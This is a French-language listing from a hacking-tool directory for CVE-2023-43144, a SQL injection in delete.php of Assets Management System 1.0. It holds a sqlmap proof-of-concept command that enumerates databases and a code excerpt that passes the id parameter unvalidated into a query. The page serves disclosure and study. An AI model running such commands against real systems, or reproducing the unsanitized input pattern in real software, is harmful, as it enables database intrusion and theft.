Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43144 — Assets Management System 1.0 est vulnérable à l'injection SQL via le paramètre id dans delete.php | Kitploit
Outils/GitHubGitHub/pegasus0xx/cve-2023-43144
Analyse des VulnérabilitésAnalyse de CodeExploitationSécurité WebSécurité des Bases de Données
GitHubpegasus0xx/cve-2023-43144

CVE-2023-43144

Assets Management System 1.0 est vulnérable à l'injection SQL via le paramètre id dans delete.php

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43144

Description

Assets Management System 1.0 est vulnérable à une injection SQL via le paramètre id dans delete.php

PoC

root@kitploit:~
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

Revue de code (delete.php)

root@kitploit:~
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 

Il n'y a ni validation ni assainissement de la variable $id. Cela signifie que toute valeur fournie par un utilisateur comme paramètre id sera directement utilisée dans la requête SQL.

Télécharger l’outil